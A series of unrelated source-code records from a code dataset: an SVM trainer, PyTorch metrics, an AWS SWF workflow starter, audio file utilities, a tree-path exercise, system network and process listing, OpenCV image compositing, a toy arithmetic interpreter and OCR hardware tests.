implementation on site https://github.com/llSourcell/Classifying_Data_Using_a_Support_Vector_Machine/blob/master/support_vector_machine_lesson.ipynb\n\ndef SVM(x, y,learning_rate,epochs):\n print(learning_rate,epochs)\n w = np.zeros(len(x[0]))\n b = 0\n # learning_rate = 0.001\n\n\n # epochs = 100000\n # epochs = 5000\n errors = []\n epoch_list = []\n\n for epoch in range(1, epochs):\n # print(epoch)\n error_count = 0\n for i in range(len(x)):\n if (y[i] * (np.dot(w, x[i]) + b) < 1):\n w = w - learning_rate * (((1 / epoch) * w) - (y[i] * x[i]))\n b = b - learning_rate * (-1 * y[i])\n error_count += 1\n else:\n w = w - learning_rate * ((1 / epoch) * w)\n\n # w=w_new\n errors.append(error_count)\n epoch_list.append(epoch)\n\n return (w, b)\n\n\ndef test(w, x, y, b):\n error_count = 0\n ctr = 0\n for i in range(len(x)):\n ctr += 1\n # print(np.dot(w, x[i]) + b, y[i])\n if (np.sign(y[i]) != np.sign(np.dot(w, x[i]) + b)):\n error_count += 1\n\n # print(error_count)\n return (ctr - error_count) / ctr\n\nlabel_path = \"E:\\ASU\\Sem 2\\SML\\Project\\Data\"\nfnames=[\"Train_Labels_10000_HU_HIST.csv\",\"Train_Labels_10000_FLAT_GRAY.csv\",\"Train_Labels_10000_KAZE.csv\"]\ndata = []\n# fname=\"Train_Labels_10000_HU_HIST.csv\"\n# fname1=\"Train_Labels_10000_BLUR_HU_HIST.csv\"\nfor fname in fnames:\n\n data=[]\n with open(os.path.join(label_path, fname)) as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n for i in range(len(row)):\n if (i > 0):\n row[i] = float(row[i])\n data.append(row)\n\n X = np.zeros([len(data), len(data[0]) - 2])\n Y = np.zeros(len(data))\n for i in range(len(data)):\n X[i] = np.asarray(data[i][1:-1])\n Y[i] = data[i][-1]\n # print(X[i],Y[i])\n\n\n Xtrain = X[:9000]\n Xtest = X[9000:]\n Ytrain = Y[:9000]\n Ytest = Y[9000:]\n\n\n epochs_list=[100,200,500,1000,5000,10000]\n learning_rate_list=[0.001,0.005,0.01,0.05,0.1,0.5]\n\n results={}\n\n ctr=0\n for i in learning_rate_list:\n results[i]={}\n for j in epochs_list:\n ctr+=1\n print(fname)\n w_b = SVM(Xtrain, Ytrain,i,j)\n results[i][j] = test(w_b[0], Xtest, Ytest, w_b[1])\n # results[i][j] = test(w_b[0], Xtrain, Ytrain, w_b[1])\n print(results[i][j])\n # if(ctr==2):\n # break\n # break\n print()\n # print(results)\n\n temp_fname = fname.split(\".\")[0]\n store_fname = temp_fname+\"_TRAIN.json\"\n with open(os.path.join(label_path,store_fname),\"w\") as json_file:\n json.dump(results,json_file)\n # break","sub_path":"SVM Gradient Descent/SVM_Gradient_Descent.py","file_name":"SVM_Gradient_Descent.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443709664","text":"# :: dhruv :: #\n\n\nimport torch\n\ndef accuracy(pred, gt):\n with torch.no_grad():\n best_pred = torch.argmax(pred, dim=1)\n \n assert best_pred.shape[0] == len(gt)\n correct = 0\n correct += torch.sum(best_pred == gt).item()\n\n return correct / len(gt)\n\n\ndef top_k_acc(pred, gt, k=3):\n with torch.no_grad():\n best_pred = torch.topk(pred, k, dim=1)[1]\n assert best_pred.shape[0] == len(gt)\n correct = 0\n for i in range(k):\n correct += torch.sum(best_pred[:,i] == gt).item()\n\n return correct / len(gt)\n\n","sub_path":"model/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141270656","text":"import os\n# Add parent directory for imports\nparentdir = 
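A tiny end-to-end check of the SVM update rule used above on a linearly separable toy set (labels in {-1, +1}); the numbers are purely illustrative:

import numpy as np

X = np.array([[2.0, 2.0], [1.5, 2.5], [-2.0, -1.0], [-1.0, -2.0]])
y = np.array([1, 1, -1, -1])

w, b, lr = np.zeros(2), 0.0, 0.01
for epoch in range(1, 1000):
    for xi, yi in zip(X, y):
        if yi * (np.dot(w, xi) + b) < 1:
            # Misclassified or inside the margin: hinge-loss subgradient step.
            w = w - lr * ((w / epoch) - yi * xi)
            b = b + lr * yi
        else:
            # Correct side of the margin: only the regularisation term pulls on w.
            w = w - lr * (w / epoch)

print(np.sign(X @ w + b))  # expect [ 1.  1. -1. -1.]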
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nos.sys.path.insert(0, parentdir)\n\nimport boto.swf\nimport json\nfrom optparse import OptionParser\nfrom S3utility.s3_notification_info import S3NotificationInfo\nimport starter_helper as helper\nfrom starter_helper import NullRequiredDataException\n\n\"\"\"\nAmazon SWF SilentCorrectionsIngest starter, preparing article xml for lax.\n\"\"\"\n\n\nclass starter_SilentCorrectionsIngest():\n def __init__(self):\n self.const_name = \"SilentCorrectionsIngest\"\n\n def start(self, settings, info=None, run=None):\n\n # Log\n logger = helper.get_starter_logger(settings.setLevel, helper.get_starter_identity(self.const_name))\n\n if hasattr(info, 'file_name') == False or info.file_name is None:\n raise NullRequiredDataException(\"filename is Null / Did not get a filename.\")\n\n input = S3NotificationInfo.to_dict(info)\n input['run'] = run\n input['version_lookup_function'] = \"article_highest_version\"\n input['force'] = True\n\n workflow_id, \\\n workflow_name, \\\n workflow_version, \\\n child_policy, \\\n execution_start_to_close_timeout, \\\n workflow_input = helper.set_workflow_information(self.const_name, \"1\", None, input,\n info.file_name.replace('/', '_'))\n\n # Simple connect\n conn = boto.swf.layer1.Layer1(settings.aws_access_key_id, settings.aws_secret_access_key)\n\n try:\n response = conn.start_workflow_execution(settings.domain, workflow_id, workflow_name, workflow_version,\n settings.default_task_list, child_policy,\n execution_start_to_close_timeout, workflow_input)\n\n logger.info('got response: \\n%s' % json.dumps(response, sort_keys=True, indent=4))\n\n except NullRequiredDataException as e:\n logger.exception(e.message)\n raise\n\n except boto.swf.exceptions.SWFWorkflowExecutionAlreadyStartedError:\n # There is already a running workflow with that ID, cannot start another\n message = 'SWFWorkflowExecutionAlreadyStartedError: There is already a running workflow with ID %s' % workflow_id\n logger.info(message)\n\n\nif __name__ == \"__main__\":\n\n doi_id = None\n\n # Add options\n parser = OptionParser()\n parser.add_option(\"-e\", \"--env\", default=\"dev\", action=\"store\", type=\"string\", dest=\"env\",\n help=\"set the environment to run, either dev or live\")\n parser.add_option(\"-f\", \"--filename\", default=None, action=\"store\", type=\"string\", dest=\"filename\",\n help=\"specify the DOI id the article to process\")\n\n (options, args) = parser.parse_args()\n if options.env:\n ENV = options.env\n if options.filename:\n filename = options.filename\n\n import settings as settingsLib\n settings = settingsLib.get_settings(ENV)\n\n o = starter_SilentCorrectionsIngest()\n\n o.start(settings=settings,)\n","sub_path":"starter/starter_SilentCorrectionsIngest.py","file_name":"starter_SilentCorrectionsIngest.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483175521","text":"import sys\nimport os\nimport glob\nimport re\nimport scipy.io.wavfile as wf\nimport numpy as np\n\nfrom .default_constants import *\nfrom .helper_functions import *\n\ndef decompose_path(path):\n 'path を (directory, stem, extension) に分解'\n directory, base_name = os.path.split(path)\n stem, extension = os.path.splitext(base_name)\n return (directory, stem, extension)\n\ndef compose_path(directory, stem, extension):\n '(directory, stem, extension) からパスを合成'\n return os.path.join(directory, stem + extension)\n\ndef make_directory_exist(path):\n '''\n 
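The SWF starter above parses its flags with optparse, which has been deprecated since Python 2.7; an equivalent sketch with argparse, keeping the same -e/--env and -f/--filename options:

import argparse

parser = argparse.ArgumentParser()
parser.add_argument('-e', '--env', default='dev',
                    help='set the environment to run, either dev or live')
parser.add_argument('-f', '--filename', default=None,
                    help='specify the filename of the article to process')
args = parser.parse_args()
print(args.env, args.filename)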
指定パスのディレクトリが存在しなければ作成する。\n ファイルパスを渡すこともできる\n '''\n if len(path) == 0:\n return\n if not os.path.isdir(path):\n directory, _, _ = decompose_path(path)\n if directory == '':\n return\n if not os.path.exists(directory):\n os.makedirs(directory)\n\ndef detect_stem_tail_number(stem):\n '''\n ファイル名のステム末尾についている番号を検出する。\n 見つからなかった場合は 0 を返す。\n '''\n m = re.match('^(.+?)(\\\\d+)$', stem)\n if m is None:\n return 0\n groups = m.groups()\n if len(groups) == 1:\n return 0\n else:\n return int(groups[1])\n\ndef pad_stem_zero(stem, number_of_digit):\n '''\n ファイル名のステム stem の末尾に付いている番号を digit 桁にゼロパディングする。\n 末尾に番号の付いていないステムが与えられた場合は入力をそのまま返す。\n '''\n m = re.match('^(.+?)(\\\\d+)$', stem)\n if m is None:\n return stem\n groups = m.groups()\n if len(groups) == 1:\n return stem\n else:\n return groups[0] + groups[1].zfill(number_of_digit)\n\ndef load_samples(samples_path, internal_sample_format):\n '''\n wav ファイルからサンプル列をロードする\n '''\n # 存在チェック\n if not os.path.exists(samples_path):\n raise Exception('Specified file \"%s\" has not existed.' % samples_path)\n # ロード\n sample_rate, input_samples = wf.read(samples_path)\n # フォーマットを指定のものに変換する\n if internal_sample_format == 'float64':\n converted_samples = input_samples.astype(np.float64)\n elif internal_sample_format == 'float32':\n converted_samples = input_samples.astype(np.float32)\n elif internal_sample_format == 'int32':\n converted_samples = input_samples.astype(np.int32)\n elif internal_sample_format == 'int16':\n converted_samples = input_samples.astype(np.int16)\n else:\n raise RuntimeError('Invalid data type string : ' + internal_sample_format)\n return converted_samples, sample_rate\n\ndef save_samples(samples_path, samples, samplerate, export_sample_format):\n '''\n wav ファイルにサンプル列をセーブする\n '''\n make_directory_exist(samples_path)\n # フォーマットを指定のものに変換する\n if export_sample_format == 'float32':\n converted_samples = samples.astype(np.float32)\n elif export_sample_format == 'int32':\n converted_samples = samples.astype(np.int32)\n elif export_sample_format == 'int16':\n converted_samples = samples.astype(np.int16)\n else:\n raise RuntimeError('Invalid data type string : ' + export_sample_format)\n wf.write(samples_path, samplerate, converted_samples)\n\ndef find_wav_files(dir_path):\n '''\n 指定ディレクトリ内の wav ファイルを検索する。\n '''\n # 指定ディレクトリ中の wav ファイルを列挙\n wav_files = glob.glob(os.path.join(dir_path, '*.wav'))\n if len(wav_files) == 0:\n print('No wav file in directory \"%s\".' % dir_path)\n return None\n # ファイルステム末尾の番号でソート\n sorted_wav_files = sorted(wav_files, key=lambda path: detect_stem_tail_number(decompose_path(path)[1]))\n # 正常終了\n return sorted_wav_files\n\ndef find_ini_file(dir_path):\n '''\n 指定ディレクトリ内の ini ファイルを検索する。\n '''\n # 指定ディレクトリ中の ini ファイルを列挙\n ini_files = glob.glob(os.path.join(dir_path, '*.ini'))\n if len(ini_files) == 0:\n print('No ini files in directory \"%s\".' % dir_path)\n return None\n elif 1 < len(ini_files):\n print('Too many ini files in directory \"%s\".' 
% dir_path)\n return None\n # 正常終了\n return ini_files[0]\n\ndef load_wav_files(wav_files_path, internal_sample_format):\n '''\n 指定ファイル全てをメモリ上にロード\n '''\n samplerate = 0\n samples_list = []\n for p in wav_files_path:\n # ロード\n try:\n temp_input, temp_sampletate = load_samples(p, INTERNAL_SAMPLE_FORMAT)\n except Exception as err:\n print(err)\n raise\n # サンプルレートをチェック\n if samplerate == 0:\n samplerate = temp_sampletate\n elif samplerate != temp_sampletate:\n print('Wrong sample rate is detected in input files.')\n print('File = ' + p)\n print('Expected sample rate = ' + samplerate)\n print('Actual sample rate = ' + temp_sampletate)\n exit(1)\n # 無音サンプルはスキップ\n if is_slient_samples(temp_input):\n continue\n # ロードした波形をリストに追加\n samples_list.append({'stereo': temp_input, 'path': p})\n # 正常終了\n return samples_list, samplerate\n","sub_path":"nupan_offline_audio_tools/details/file_functions.py","file_name":"file_functions.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"94929736","text":"\"\"\"\nQ6:\n\nImplement long paths, which returns a list of all paths in a tree with length at least\nn. A path in a tree is a linked list of node values that starts with the root and ends\nat a leaf. Each subsequent element must be from a child of the previous value’s\nnode. The length of a path is the number of edges in the path (i.e. one less than\nthe number of nodes in the path). Paths are listed in order from left to right. See\nthe doctests for some examples.\n\"\"\"\n\ndef long_paths(tree, n):\n \"\"\"Return a list of all paths in tree with length at least n.\n >>> t = Tree(3, [Tree(4), Tree(4), Tree(5)])\n >>> left = Tree(1, [Tree(2), t])\n >>> mid = Tree(6, [Tree(7, [Tree(8)]), Tree(9)])\n >>> right = Tree(11, [Tree(12, [Tree(13, [Tree(14)])])])\n >>> whole = Tree(0, [left, Tree(13), mid, right])\n >>> for path in long_paths(whole, 2):\n ... print(path)\n ...\n <0 1 2>\n <0 1 3 4>\n <0 1 3 4>\n <0 1 3 5>\n <0 6 7 8>\n <0 6 9>\n <0 11 12 13 14>\n >>> for path in long_paths(whole, 3):\n ... 
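find_wav_files in the record above sorts take files by the number at the end of the stem because plain lexicographic order puts 'take10' before 'take2'; a standalone demo of that sort key:

import re

def tail_number(stem):
    m = re.match(r'^(.+?)(\d+)$', stem)
    return int(m.group(2)) if m else 0

names = ['take10', 'take2', 'take1']
print(sorted(names))                   # ['take1', 'take10', 'take2']
print(sorted(names, key=tail_number))  # ['take1', 'take2', 'take10']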
print(path)\n ...\n <0 1 3 4>\n <0 1 3 4>\n <0 1 3 5>\n <0 6 7 8>\n <0 11 12 13 14>\n >>> long_paths(whole, 4)\n [Link(0, Link(11, Link(12, Link(13, Link(14)))))]\n \"\"\"\n paths = []\n if n <= 0 and tree.is_leaf():\n paths.append(Link(tree.label))\n for b in tree.branches:\n for path in long_paths(b, n - 1):\n paths.append(Link(tree.label, path))\n return paths\n\n# Link Class\n\nclass Link:\n empty = ()\n def __init__(self, first, rest=empty):\n assert rest is Link.empty or isinstance(rest, Link)\n self.first = first\n self.rest = rest\n\n def __repr__(self):\n if self.rest:\n rest_str = ', ' + repr(self.rest)\n else:\n rest_str = ''\n return 'Link({0}{1})'.format(repr(self.first), rest_str)\n\n def __str__(self):\n string = '<'\n while self.rest is not Link.empty:\n string += str(self.first) + ' '\n self = self.rest\n return string + str(self.first) + '>'\n\n# Tree Class\n\nclass Tree:\n def __init__(self, label, branches=[]):\n for b in branches:\n assert isinstance(b, Tree)\n self.label = label\n self.branches = branches\n\n def is_leaf(self):\n return not self.branches\n\n def __repr__(self):\n if self.branches:\n branches_str = ', ' + repr(self.branches)\n else:\n branches_str = ''\n return 'Tree({0}{1})'.format(self.label, branches_str)\n","sub_path":"assets/code/sol6.py","file_name":"sol6.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19696622","text":"import psutil\nfrom prettytable import PrettyTable\nimport netifaces\n\ndef test():\n print (psutil.net_io_counters(pernic=True))\n\ndef proc_redes():\n pro_table = PrettyTable(['Endereço', 'Mascara', 'Gateway'])\n for i in netifaces.interfaces():\n try:\n pro_table.add_row([\n netifaces.ifaddresses(i)[netifaces.AF_INET][0]['addr'],\n netifaces.ifaddresses(i)[netifaces.AF_INET][0]['netmask'],\n netifaces.gateways()['default'][netifaces.AF_INET][0],\n\n ])\n\n except Exception as e:\n pass\n print(pro_table)\n\n\ndef conexao():\n table = PrettyTable(['Conexão', 'Status', 'Velocidade'])\n for key in psutil.net_if_stats().keys():\n name = key\n up = \"Up\" if psutil.net_if_stats()[key].isup else \"Down\"\n speed = psutil.net_if_stats()[key].speed\n table.add_row([name, up, speed])\n print(table)\n\n\ndef processos():\n process_table = PrettyTable(['PID', 'PNAME', 'STATUS', 'NUM THREADS'])\n for process in psutil.pids()[-10:]:\n try:\n p = psutil.Process(process)\n process_table.add_row([\n str(process),\n p.name(),\n p.status(),\n p.num_threads()\n ])\n\n except Exception as e:\n pass\n print(process_table)\n\nprint(\"----Procesos de rede----\")\nproc_redes()\nprint(\"----Conexão----\")\nconexao()\nprint(\"----Processos----\")\nprocessos()\nprint(\"----Todos os processos na máquina----\")\ntest()","sub_path":"dados/redes.py","file_name":"redes.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22828763","text":"def growingPlant(upSpeed, downSpeed, desiredHeight):\n \"\"\"Each day a plant is growing by upSpeed meters. Each night that plant's \n height decreases by downSpeed meters due to the lack of sun heat. Initially,\n plant is 0 meters tall. We plant the seed at the beginning of a day. 
 We want\n    to know when the height of the plant will reach a certain level.\"\"\"\n\n    height = 0\n    days = 0\n\n    while True:\n        days += 1\n        height += upSpeed\n\n        if height >= desiredHeight:\n            return days\n        else:\n            height -= downSpeed","sub_path":"growing-plant.py","file_name":"growing-plant.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"163102849","text":"import cv2\nimport os\nimport os.path as osp\nimport numpy as np\nimport random\nfrom process import black_process_two\n\n\ndef mix_two_images(base, img2):\n\troi = base[55:335, 145:545]\n\t# roi = base[43:421, 139:525]\n\t# Cut the object out of pre2 (the processed img2) and paste it onto the processed base image\n\t# img2 = img2[43:421, 139:525]\n\timg2 = cv2.resize(img2, (400, 280))\n\tmask, pre2 = black_process_two(img2)\n\t# cv2.imshow('mask', mask)\n\n\tmask_inv = cv2.bitwise_not(mask)\n\n\t# mask is a binary mask: where mask == 0 the source pixels become black, everywhere else they stay unchanged\n\timg1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\n\t# cv2.imshow('img1_bg', img1_bg)\n\timg2_bg = cv2.bitwise_and(pre2, pre2, mask=mask)\n\n\tdst = cv2.add(img1_bg, img2_bg)\n\tbase[55:335, 145:545] = dst\n\n\treturn base \n\n\n# Total number of objects\nN = random.randint(2, 4) \nn = random.randint(4, 10)\npath = '/home/guo/project/camera_process/combine/Images3/Before/'\n\n# Randomly choose N folders (i.e. N objects) from the path, then randomly pick n images from each folder\nall_file = random.sample(os.listdir(path), N)\n# image_list = [osp.join(i, random.choice(os.listdir(osp.join(path, i)))) for i in all_file]\nimage_list = [osp.join(i, j) for i in all_file for j in random.sample(os.listdir(osp.join(path, i)), n) ]\n\n# img1 = cv2.imread(osp.join(path, image_list[0]))\nbase = cv2.imread('back.jpg')\n# _, base = black_process_two(img1)\n\nfor i in random.sample(image_list, random.randint(1, 8)):\n\timg = osp.join(path, i)\n\timg = cv2.imread(img)\n\tbase = mix_two_images(base, img)\n\n\ncv2.imshow('mask', base)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"抠图/combination_light.py","file_name":"combination_light.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"61025114","text":"# Token types\n#\n# EOF (end-of-file) token is used to indicate that\n# there is no more input left for lexical analysis\nINTEGER, PLUS, EOF, WS, MINUS = 'INTEGER', 'PLUS', 'EOF', 'WHITESPACE', 'MINUS'\n\n\n# DEBUG FLAG\nDEBUG = False\n\n\nclass Token(object):\n    def __init__(self, type, value):\n        # token type: INTEGER, PLUS, MINUS, WHITESPACE, or EOF\n        self.type = type\n        # token value: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, '+', '-', ' ', or None\n        self.value = value\n\n    def __str__(self):\n        \"\"\"String representation of the class instance.\n\n        Examples:\n            Token(INTEGER, 3)\n            Token(PLUS '+')\n        \"\"\"\n        return 'Token({type}, {value})'.format(\n            type=self.type,\n            value=repr(self.value)\n        )\n\n    def __repr__(self):\n        return self.__str__()\n\n\nclass Interpreter(object):\n    def __init__(self, text):\n        # client string input, e.g. \"3+5\"\n        self.text = text\n        # self.pos is an index into self.text\n        self.pos = 0\n        # current token instance\n        self.current_token = None\n\n\n    def error(self):\n        raise Exception('Error parsing input')\n\n    def get_next_token(self):\n        \"\"\"Lexical analyzer (also known as scanner or tokenizer)\n\n        This method is responsible for breaking a sentence\n        apart into tokens. 
One token at a time.\n \"\"\"\n text = self.text\n\n # is self.pos index past the end of the self.text ?\n # if so, then return EOF token because there is no more\n # input left to convert into tokens\n if self.pos > len(text) - 1:\n return Token(EOF, None)\n\n # get a character at the position self.pos and decide\n # what token to create based on the single character\n current_char = text[self.pos]\n\n # if the character is a digit then convert it to\n # integer, create an INTEGER token, increment self.pos\n # index to point to the next character after the digit,\n # and return the INTEGER token\n if current_char.isdigit():\n token = Token(INTEGER, int(current_char))\n self.pos += 1\n return token\n\n if current_char == '+':\n token = Token(PLUS, current_char)\n self.pos += 1\n return token\n if current_char == '-':\n token = Token(MINUS, current_char)\n self.pos += 1\n return token\n if current_char == ' ':\n token = Token(WS, current_char)\n self.pos += 1\n return token\n\n self.error()\n\n def eat(self, token_type):\n # compare the current token type with the passed token\n # type and if they match then \"eat\" the current token\n # and assign the next token to the self.current_token,\n # otherwise raise an exception.\n if self.current_token.type == token_type:\n self.current_token = self.get_next_token()\n return True\n else:\n # self.error()\n return False\n\n def expr(self):\n \"\"\"expr -> INTEGER PLUS INTEGER\"\"\"\n\n # set current token to the first token taken from the input\n self.current_token = self.get_next_token() \n\n # skip whitespace\n self.skip_whitespace()\n \n # we expect the current token to be an integer\n left = self.get_operand()\n\n # skip whitespace\n self.skip_whitespace()\n\n # we expect the current token to be a '+' token\n op = self.current_token\n self.check_operator()\n\n # skip whitespace\n self.skip_whitespace()\n\n # we expect the current token to be an integer\n right = self.get_operand()\n\n # after the above call the self.current_token is set to\n # EOF token\n\n # at this point INTEGER PLUS INTEGER sequence of tokens\n # has been successfully found and the method can just\n # return the result of adding two integers, thus\n # effectively interpreting client input\n result = self.perform_op(left, right, op)\n return result\n\n\n def get_operand(self):\n \"\"\"Get an integer operand. Returns a token\"\"\"\n # first token must be an integer\n if self.current_token.type != INTEGER:\n self.error()\n\n prev_token = self.current_token\n res = Token(INTEGER, 0)\n # Keep eating until you get to a non-integer token\n while(self.eat(INTEGER)):\n # update the value by multiplying current value by 10 and then adding the value of the previous token\n res.value = 10 * res.value + prev_token.value\n prev_token = self.current_token\n return res\n\n def check_operator(self):\n \"\"\"Get an arithmetic operator. 
Returns a token\"\"\"\n if self.eat(PLUS) or self.eat(MINUS):\n pass\n else:\n # if not + or - then return error\n self.error()\n\n def perform_op(self, left, right, op):\n if op.type == PLUS:\n return left.value + right.value\n elif op.type == MINUS:\n return left.value - right.value\n else:\n self.error()\n\n def skip_whitespace(self):\n \"\"\" Skips Whitespace \"\"\"\n while self.eat(WS):\n pass\n\n\ndef test_get_operand():\n interp = Interpreter(\"12+5\")\n exp = 12\n interp.current_token = interp.get_next_token()\n res = interp.get_operand().value\n print(\"exp:\", exp, \"res:\", res)\n assert exp == res\n interp = Interpreter(\"1234+5\")\n exp = 1234\n interp.current_token = interp.get_next_token()\n res = interp.get_operand().value\n print(\"exp:\", exp, \"res:\", res)\n assert exp == res\n interp = Interpreter(\"+5\")\n try:\n interp.current_token = interp.get_next_token()\n res = interp.get_operand().value\n except Exception:\n print(\"Caught Exception\")\n\ndef test():\n test_get_operand()\n\n\n\ndef main():\n if DEBUG:\n test()\n else:\n while True:\n try:\n try:\n text = input('calc> ')\n except NameError: # Python3\n text = input('calc> ')\n except EOFError:\n break\n if not text:\n continue\n interpreter = Interpreter(text)\n result = interpreter.expr()\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"part1/calc1-1.py","file_name":"calc1-1.py","file_ext":"py","file_size_in_byte":6372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592079444","text":"# Copyright (c) 2018, TU Kaiserslautern\n# Copyright (c) 2018, Xilinx, Inc.\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without \n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, \n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright \n# notice, this list of conditions and the following disclaimer in the \n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its \n# contributors may be used to endorse or promote products derived from \n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, \n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR \n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR \n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, \n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, \n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION). 
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, \n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR \n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF \n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport os\nimport rnn\nimport pytest\nimport numpy as np\nfrom PIL import Image\n\ndef test_plain_ocr():\n precisions = [\"W2A2\", \"W4A8\"]\n test_dir = os.path.dirname(os.path.realpath(__file__))\n for precision in precisions:\n hw_ocr = rnn.PynqPlainOCR(runtime=rnn.RUNTIME_HW, precision=precision)\n im = Image.open(os.path.join(test_dir, 'Test_images', 'plain', precision, '010077.bin.png'))\n with open(os.path.join(test_dir, 'Test_images', 'plain', precision, 'test_image_gt.txt'), 'r') as f:\n print(\"Prec = {}\".format(precision)) \n gt = f.read().replace('\\n', '')\n hw_result = hw_ocr.inference(im)\n _, _, hw_recognized_text = hw_result\n hw_ocr.cleanup()\n print(\"Label = {}\".format(gt))\n print(\"Pred = {}\\n\".format(hw_recognized_text))\n assert gt == hw_recognized_text\n\ndef test_seq_mnist_ocr():\n network = \"bigru\"\n precisions = [\"W2A2\", \"W4A4\", \"W8A8\"]\n test_dir = os.path.dirname(os.path.realpath(__file__))\n for precision in precisions:\n hw_ocr = rnn.PynqSeqMnistOCR(runtime=rnn.RUNTIME_HW, network=network, precision=precision)\n # uncomment this if using uni birectional rnn\n # hw_ocr.bidirectional_enabled = False\n im = Image.open(os.path.join(test_dir, 'Test_images', 'seq_mnist', precision, 'test_image.png'))\n with open(os.path.join(test_dir, 'Test_images', 'seq_mnist', precision, 'test_image_gt.txt'), 'r') as f:\n print(\"Prec = {}\".format(precision))\n gt = f.read().replace('\\n', '')\n hw_result = hw_ocr.inference(im)\n _, _, hw_recognized_text = hw_result\n hw_ocr.cleanup()\n print(\"Label = {}\".format(gt))\n print(\"Pred = {}\\n\".format(hw_recognized_text))\n assert gt == hw_recognized_text\n\nif __name__ == '__main__':\n test_seq_mnist_ocr()\n","sub_path":"tests/test_ocr.py","file_name":"test_ocr.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522871687","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 1 11:32:26 2019\r\n\r\n@author: vmpsk\r\n\"\"\"\r\n\r\n\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nfrom shutil import copyfile\r\nfrom pathlib import Path\r\nimport numpy as np\r\nfrom tkinter import Tk\r\n\r\nimport os\r\nimport tkinter\r\nimport PIL.Image, PIL.ImageTk\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom tkinter.filedialog import askdirectory\r\n\r\nimport numpy as np\r\nimport random\r\nimport math\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport datetime\r\nfrom copy import copy, deepcopy\r\nfrom numpy import unravel_index\r\nfrom IPython import get_ipython\r\nimport cmath\r\n\r\npi = 3.141592\r\n##----Generate array of float values-------------------------------------------\r\ndef frange(start, stop, step):\r\n arr = []\r\n i = start\r\n while i < stop:\r\n arr.append(i)\r\n i += step\r\n arr.append(i) \r\n return(arr) \r\n\r\n##----Import data from file as 2D matrix---------------------------------------\r\ndef MatrixImport(Fileloc): \r\n moment_stringlist = []\r\n with open(Fileloc) as f:\r\n for line in f: # \\\r\n moment_stringlist.append(line)\r\n \r\n moment = [] # Moment string list to magnetic moment matrix\r\n for line in moment_stringlist:\r\n moment = moment + line.strip( '\\n' ).split(' ') \r\n \r\n 
xx = len(moment_stringlist)\r\n yy = len(moment_stringlist)\r\n moment = np.reshape(moment, (xx, yy)).astype(np.float)\r\n return(moment)\r\n#\r\n#class App(object):\r\n# def __init__(self, window, window_title):#, image_path=(foldername+'.png')):\r\n# self.window = window\r\n# self.window.title(window_title) \r\n# #-------Frames and grid----------------\r\n# self.frame = tkinter.Frame(window)\r\n# self.frame.grid(row=0,column=0, sticky=tkinter.N) \r\n# #========Buttons=======================\r\n# self.btn_Read_path1 = tkinter.Button(self.frame, text=\"Vertex Stat file select\", width=25, command=self.Read_path1) # Button that lets the user to draw grid \r\n# self.btn_Read_path1.grid(row=0,column=0) #self.btn_blur.pack(anchor=tkinter.CENTER, expand=True)\r\n## self.btn_Read_path2 = tkinter.Button(self.frame, text=\"Save Result\", width=25, command=self.Read_path2) # Button that lets the user to draw grid \r\n## self.btn_Read_path2.grid(row=1,column=0) #self.btn_blur.pack(anchor=tkinter.CENTER, expand=True) \r\n## self.btn_Read_path3 = tkinter.Button(self.frame, text=\"Read parameters\", width=20, command=self.Read_paramters) # Button that lets the user to draw grid \r\n## 